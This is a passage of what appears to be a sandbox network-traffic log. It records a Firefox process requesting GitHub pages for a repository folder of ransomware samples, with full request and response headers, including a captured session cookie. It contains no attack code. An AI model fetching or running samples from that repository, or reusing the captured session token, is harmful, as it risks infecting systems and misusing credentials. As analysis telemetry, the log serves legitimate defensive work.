                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          if-none-match: W/"e61453a6d8b82727dfe87839b3fc469c"
                          te: trailers
                          Response
                          HTTP/2.0 304
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:29:25 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"e61453a6d8b82727dfe87839b3fc469c"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          x-github-request-id: C56E:2E84B3:182D54:1C4EAD:6797C275
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/tree/master/ransomwares HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: text/html, application/xhtml+xml
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
                          turbo-visit: true
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          if-none-match: W/"134621081d3501453abea3a3160ad737"
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:29:28 GMT
                          content-type: text/html; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"b73b3d4363a0ec0a2914f64e7c8b6e22"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          x-html-safe: 33e84c7bdcf00760a1e8e79a298b669303c5a66565534ab525c26b9ca425589f
                          x-github-request-id: C56E:2E84B3:182F1C:1C50D0:6797C275
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/tree/master/ransomwares HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
                          x-requested-with: XMLHttpRequest
                          x-github-target: dotcom
                          x-react-router: json
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          te: trailers
                          Response
                          HTTP/2.0 200
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:29:28 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"73f2ea82e228aaef8e27ff3f9599b8f3"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          content-length: 1202
                          x-github-request-id: C56E:2E84B3:182F2D:1C50DE:6797C278
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/latest-commit/master/ransomwares HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          if-none-match: W/"97528c517ff2a1874ec155f6281f47f6"
                          te: trailers
                          Response
                          HTTP/2.0 304
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:29:29 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"e61453a6d8b82727dfe87839b3fc469c"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          x-github-request-id: C56E:2E84B3:182F74:1C5142:6797C279
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/tree-commit-info/master/ransomwares
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/tree-commit-info/master/ransomwares HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          if-none-match: W/"2f35a548192aa4c7f03cb33866cc9d1e"
                          te: trailers
                          Response
                          HTTP/2.0 304
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:29:29 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"2f35a548192aa4c7f03cb33866cc9d1e"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; worker-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/
                          content-encoding: gzip
                          accept-ranges: bytes
                          x-github-request-id: C56E:2E84B3:182F74:1C513E:6797C279
                        • flag-gb
                          GET
                          https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares
                          firefox.exe
                          Remote address:
                          20.26.156.215:443
                          Request
                          GET /Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares HTTP/2.0
                          host: github.com
                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
                          accept: application/json
                          accept-language: en-US,en;q=0.5
                          accept-encoding: gzip, deflate, br
                          referer: https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwares
                          content-type: application/json
                          github-verified-fetch: true
                          x-requested-with: XMLHttpRequest
                          cookie: _gh_sess=Kv4WIWm1qmO4Zmzh1QuzZMR9T28UmPzmU03%2FfDdj6LvAsLGrlF3vWbtQv2PPtwv%2BuBQ4bLQRjZfpQ9eFl91liCLiUNM5%2F%2BVSXFfeElESr1ArP%2BHr%2BXQGwPSNYEEwoYg%2BMn7deXYZL4WP301jpG%2BsOAZl3RWbff%2FHOs7FX3BocS2cAo1FTPXRFfT7amt4gLQFpGy3BNe2kkcS1yN%2BAN%2BFit2LH04qL3gsgdXuwPWOF%2Fa1VYH%2B76DJ7udz6dV0yUJaw1TvUzPDFclZshzdiTi5Tw%3D%3D--3taxrxrUIuEW6AAJ--deCMOj3dbA20ypRyPCCPbQ%3D%3D
                          cookie: _octo=GH1.1.216770144.1737998780
                          cookie: logged_in=no
                          cookie: cpu_bucket=lg
                          cookie: preferred_color_mode=light
                          cookie: tz=UTC
                          sec-fetch-dest: empty
                          sec-fetch-mode: cors
                          sec-fetch-site: same-origin
                          if-none-match: W/"e61453a6d8b82727dfe87839b3fc469c"
                          te: trailers
                          Response
                          HTTP/2.0 304
                          server: GitHub.com
                          date: Mon, 27 Jan 2025 17:29:29 GMT
                          content-type: application/json; charset=utf-8
                          vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                          etag: W/"97528c517ff2a1874ec155f6281f47f6"
                          cache-control: max-age=0, private, must-revalidate
                          strict-transport-security: max-age=31536000; includeSubdomains; preload
                          x-frame-options: deny
                          x-content-type-options: nosniff
                          x-xss-protection: 0
                          referrer-policy: no-referrer-when-downgrade
                          content-security-policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com api.githubcopilot.com api.individual.githubcopilot.com api.business.githubcopilot.com api.enterprise.githubcopilot.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com copilot-workspace.githubnext.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: blob: github.githubassets.com media.githubusercontent.com camo.githubusercontent.com identicons.github.com avatars.githubusercontent.com private-avatars.githubusercontent.com github-cloud.s3.amazonaws.com objects.githubusercontent.com secured-user-images.githubusercontent.com/ user-images.githubusercontent.com/ private-user-images.githubusercontent.com opengraph.githubassets.com github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com objects-origin.githubusercontent.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/ private-user-images.githubusercontent.com github-production-user-asset-6210df.s3.amazonaws.com gist.github.com; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; upgrade-insecure-requests; 